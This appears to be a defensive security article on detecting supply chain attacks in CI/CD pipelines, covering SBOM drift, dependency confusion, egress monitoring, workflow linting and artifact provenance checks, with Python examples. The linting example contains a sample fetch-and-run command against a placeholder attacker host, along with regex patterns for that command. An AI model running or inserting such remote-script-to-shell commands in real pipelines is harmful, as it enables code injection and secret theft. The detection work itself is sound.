
Detecting Supply Chain Attacks in CI/CD Pipelines

The security perimeter has fundamentally shifted. For decades, the industry focused on hardening the network edge: firewalls, WAFs, and intrusion detection systems. However, as organizations moved toward DevOps and automated delivery, the "edge" dissolved into a complex web of interconnected dependencies, automated build agents, and ephemeral infrastructure.

The CI/CD pipeline is now the high-value target. Unlike a traditional breach where an attacker seeks to exfiltrate data from a database, a supply chain attack seeks to inject malicious logic into the software itself. If an attacker can compromise a build script, a container base image, or a third-party library, they inherit the trust already granted to your deployment process. Detecting these attacks requires moving beyond simple vulnerability scanning and toward a rigorous model of integrity verification across the entire software lifecycle.

The Anatomy of a Pipeline Compromise

To detect an attack, we must first categorize the vectors. Supply chain attacks in CI/CD generally fall into three architectural layers:

  1. Input Poisoning (Dependency Attacks): Malicious code introduced via external libraries, transitive dependencies, or "dependency confusion" attacks.
  2. Process Tampering (Build Environment Attacks): Unauthorized modifications to the build instructions (e.g., `Jenkinsfile`, `.github/workflows`), compromised build runners, or poisoned container images used as build environments.
  3. Output Manipulation (Artifact Attacks): Tampering with the compiled binaries, container images, or configuration files after they have been built but before they are signed or deployed.

Layer 1: Detecting Input Poisoning

The most common attack vector is the dependency. Attackers exploit the automated nature of package managers (NPM, PyPI, Maven) to inject malicious code.

Software Bill of Materials (SBOM) and Drift Analysis

Detection begins with visibility. You cannot detect what you cannot see. Implementing an automated SBOM generation step, using tools like Syft or CycloneDX, is critical. However, an SBOM is only useful if it feeds drift analysis.

By comparing the SBOM of a new build against a "known-good" baseline from a previous stable release, you can programmatically detect the introduction of new, unvetted transitive dependencies. An alert should trigger if a build introduces a package that has no previous history in your ecosystem or originates from an untrusted registry.
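A minimal sketch of that comparison, assuming SBOMs in a CycloneDX-style JSON layout with a top-level `components` array; the package names and the `new_components` helper are illustrative, not part of any tool's API:

```python
def new_components(baseline_sbom: dict, candidate_sbom: dict) -> set[str]:
    """Return name@version identifiers present in the candidate SBOM
    but absent from the known-good baseline (CycloneDX-style layout)."""
    def names(sbom: dict) -> set[str]:
        return {
            f"{c.get('name')}@{c.get('version')}"
            for c in sbom.get("components", [])
        }
    return names(candidate_sbom) - names(baseline_sbom)

# Hypothetical SBOM fragments for illustration.
baseline = {"components": [{"name": "requests", "version": "2.31.0"}]}
candidate = {"components": [
    {"name": "requests", "version": "2.31.0"},
    {"name": "evil-helper", "version": "0.0.1"},  # unvetted newcomer
]}

drift = new_components(baseline, candidate)
if drift:
    print(f"ALERT: unvetted dependencies introduced: {sorted(drift)}")
```

In practice the baseline would be the SBOM archived from the last stable release, and any non-empty result would gate the build pending review.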

Detecting Dependency Confusion

Dependency confusion occurs when an attacker publishes a package to a public registry with the same name as an internal, private package but with a higher version number. To detect this, your CI/CD pipeline must implement namespace shadowing detection. This involves auditing your package manager configuration to ensure that internal scopes (e.g., `@company-internal/`) are explicitly routed to private registries and never allowed to fall back to public mirrors.
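One way to sketch that audit for an NPM setup, assuming scope routing lives in `.npmrc`-style `@scope:registry=` lines; the `@acme` scope, the private host name, and the `audit_npmrc` helper are assumptions for illustration:

```python
from urllib.parse import urlparse

# Assumption: your organisation's private registry host(s).
PRIVATE_HOSTS = {"registry.internal.example.com"}

def audit_npmrc(npmrc_text: str, internal_scopes: set[str]) -> list[str]:
    """Flag internal scopes that are missing an explicit route or are
    routed outside the private registry, leaving them exposed to
    dependency confusion via public-mirror fallback."""
    routes = {}
    for line in npmrc_text.splitlines():
        line = line.strip()
        if line.startswith("@") and ":registry=" in line:
            scope, url = line.split(":registry=", 1)
            routes[scope] = urlparse(url).hostname
    findings = []
    for scope in sorted(internal_scopes):
        host = routes.get(scope)
        if host is None:
            findings.append(f"{scope}: no explicit registry (falls back to public)")
        elif host not in PRIVATE_HOSTS:
            findings.append(f"{scope}: routed to untrusted host {host}")
    return findings

good = "@acme:registry=https://registry.internal.example.com/\n"
bad = "registry=https://registry.npmjs.org/\n"
print(audit_npmrc(bad, {"@acme"}))
```

Running this check on every pipeline execution, rather than once at setup time, also catches an attacker who tampers with the registry configuration mid-stream.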

Layer 2: Detecting Process Tampering

The build runner is a transient but highly privileged execution environment. If an attacker gains access to a runner, they can modify the build logic to inject a backdoor into the final artifact without changing a single line of source code in your Git repository.

Network Egress Monitoring

A hallmark of a compromised build process is unauthorized communication. A build script's primary job is to compile code and move artifacts. It rarely needs to communicate with unknown IP addresses or non-whitelisted domains.

Implementing egress filtering and monitoring on your build agents is one of the most effective detection strategies. By using tools like eBPF-based agents (e.g., Cilium or Tetragon), you can monitor the system calls of your build processes. If a `gcc` or `npm install` process suddenly attempts to initiate an outbound connection to a suspicious C2 (Command and Control) server, the pipeline should be immediately aborted and flagged for investigation.
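At the policy layer, the decision logic reduces to an allowlist check over the (process, destination) pairs that eBPF telemetry yields. A minimal sketch under that assumption; the allowlist entries and the `check_egress` helper are illustrative:

```python
# Assumption: destinations your build legitimately needs.
ALLOWED_EGRESS = {
    "registry.npmjs.org",
    "pypi.org",
    "artifacts.internal.example.com",
}

def check_egress(observed: list[tuple[str, str]]) -> list[str]:
    """Given (process, destination-host) pairs from build telemetry,
    return the violations that should abort the pipeline."""
    return [
        f"{proc} -> {host}"
        for proc, host in observed
        if host not in ALLOWED_EGRESS
    ]

telemetry = [
    ("npm install", "registry.npmjs.org"),  # expected package fetch
    ("gcc", "203.0.113.7"),                 # compiler should never phone home
]
violations = check_egress(telemetry)
```

The hard part in production is the telemetry source, not this check: Cilium and Tetragon handle the kernel-level capture, and the pipeline controller enforces the abort.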

Infrastructure as Code (IaC) and Pipeline Linting

Attackers often target the pipeline definition itself. A subtle change to a `.github/workflows/build.yml` file might add a single `curl | bash` command that exfiltrates secrets.

Detection requires continuous auditing of your pipeline-as-code. Implementing automated linting and policy enforcement (using Open Policy Agent/Rego) can prevent the deployment of pipelines that contain dangerous patterns, such as:

  • Use of `shell: bash` with unquoted variables, which can be exploited to execute arbitrary commands.

  • Piping remote scripts directly into a shell (e.g., `curl | bash`).

  • Lack of pinned versions for build actions or Docker images.
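A lightweight text-level sketch of such a linter, assuming GitHub Actions workflow files; a production policy would use Open Policy Agent against the parsed YAML, and the specific regexes here are illustrative approximations of the patterns above:

```python
import re

# (pattern, finding) pairs approximating the dangerous patterns above.
DANGEROUS = [
    (re.compile(r"curl[^\n|]*\|\s*(ba)?sh\b"),
     "remote script piped to shell"),
    (re.compile(r"\$\{\{\s*github\.event\.[^}]*\}\}"),
     "untrusted event data interpolated into a step"),
    (re.compile(r"uses:\s*\S+@(main|master|v?\d+)\s*$", re.M),
     "action not pinned to a commit SHA"),
]

def lint_workflow(yaml_text: str) -> list[str]:
    """Return a finding for each dangerous pattern present in the
    raw workflow text."""
    return [msg for pattern, msg in DANGEROUS if pattern.search(yaml_text)]

wf = (
    "steps:\n"
    "  - run: curl https://evil.example/x.sh | bash\n"
    "  - uses: actions/checkout@v4\n"
)
findings = lint_workflow(wf)
```

Wiring this into a required status check on pipeline-definition changes means a malicious workflow edit fails review automatically rather than relying on a human spotting one extra line.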

Layer 3: Detecting Output Manipulation

The final stage of an attack is ensuring the malicious artifact reaches production. If the build process is compromised, the resulting artifact is "poisoned" despite the source code being clean.

Implementing the SLSA Framework

To detect manipulation, you must implement the SLSA (Supply-chain Levels for Software Artifacts) framework. The goal is to move toward the higher build levels (Build L3 in the current specification), which require provenance generated by the build platform itself.

Provenance is a verifiable record of how an artifact was built. It includes the build platform, the source repository, and the specific commit SHA. Using tools like Sigstore/Cosign, you can cryptographically sign your artifacts and their associated metadata.

Detection in this layer happens at the admission control stage. In a Kubernetes environment, an admission controller (like Kyverno) should intercept every deployment request. It should verify:

  1. Is the image signed by our trusted build pipeline?
  2. Does the attached provenance match the expected source repository and commit SHA?
  3. Was the artifact built on an authorized build platform?
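The policy those checks encode can be sketched as follows, assuming the cryptographic verification (which Cosign or Kyverno actually performs) has already populated the fields; the `admit` helper and all field names are illustrative:

```python
def admit(image: dict, trusted_builder: str, expected_repo: str) -> tuple[bool, str]:
    """Admission-control policy sketch: reject any deployment whose
    signature or provenance does not match the trusted pipeline.
    Assumes signature verification has already been performed and
    its result recorded on the image record."""
    prov = image.get("provenance", {})
    if not image.get("signature_verified"):
        return False, "unsigned or signature verification failed"
    if prov.get("builder") != trusted_builder:
        return False, f"built by untrusted builder {prov.get('builder')}"
    if prov.get("source_repo") != expected_repo:
        return False, "provenance source repo mismatch"
    return True, "admitted"

good_image = {
    "signature_verified": True,
    "provenance": {
        "builder": "github-actions/acme-pipeline",  # hypothetical builder ID
        "source_repo": "github.com/acme/app",       # hypothetical repo
    },
}
decision = admit(good_image, "github-actions/acme-pipeline", "github.com/acme/app")
```

The key design choice is that detection happens at deploy time, independent of the pipeline: even a fully compromised build cannot mint an artifact that passes a verification it cannot sign.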

Conclusion

Taken together, the three layers above show that a secure approach to detecting supply chain attacks in CI/CD pipelines depends on execution discipline as much as design.

The practical hardening path combines admission-policy enforcement, workload isolation with network policy controls, certificate lifecycle governance with strict chain and revocation checks, and behavior-chain detection across process, memory, identity, and network telemetry. This combination reduces both exploitability and attacker dwell time by forcing an attacker to fail across multiple independent control layers.

Operational confidence should be measured, not assumed: track mean time to detect and remediate configuration drift, policy-gate coverage, and the vulnerable-artifact escape rate, then use those results to tune preventive policy, detection fidelity, and response runbooks on a fixed review cadence.
